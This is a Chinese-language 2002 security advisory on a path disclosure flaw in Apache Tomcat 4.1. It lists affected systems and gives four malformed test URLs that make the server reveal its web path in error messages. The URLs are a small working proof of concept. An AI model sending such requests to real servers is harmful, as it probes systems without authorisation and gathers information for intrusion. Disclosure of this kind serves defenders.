Apache Tomcat系统存在路径泄露漏洞

发布时间：2002-04-23
更新时间：2002-04-23
严重程度：中
威胁程度：服务器信息泄露
错误类型：配置错误
利用方式：服务器模式

BUGTRAQ ID：4557

受影响系统

Apache Software Foundation Tomcat 4.1
   - BSDI BSD/OS 4.0
   - Caldera OpenLinux 2.4
   - Conectiva Linux 5.1
   - Debian Linux 2.1
   - Debian Linux 2.2
   - Debian Linux 2.3
   - Digital UNIX 4.0
   - FreeBSD FreeBSD 4.5
   - FreeBSD FreeBSD 5.0
   - MandrakeSoft Linux Mandrake 7.0
   - MandrakeSoft Linux Mandrake 7.1
   - NetBSD NetBSD 1.4.1 x86
   - NetBSD NetBSD 1.4.2 x86
   - RedHat Linux 6.1 i386
   - RedHat Linux 6.2 i386
   - SGI IRIX 3.3
   - SGI IRIX 6.4
   - SGI IRIX 6.5
   - Sun Solaris 7.0
   - Sun Solaris 8.0

详细描述
Apache Tomcat 4.1存在漏洞，远程攻击者可以提交不正常请求导致服务程序返回包含WEB路径的错误信息。

测试代码
http://target/+/file.jsp
http://target/>/file.jsp
http://target/</file.jsp
http://target/%20/file.jsp

解决方案
尚无

相关信息
Wang Yun <lovehacker@chinansl.com>.
参考：http://online.securityfocus.com/archive/1/268655
http://online.securityfocus.com/archive/1/268615
http://online.securityfocus.com/bid/3199

最近严重漏洞

Apache Tomcat系统存在路径泄露漏洞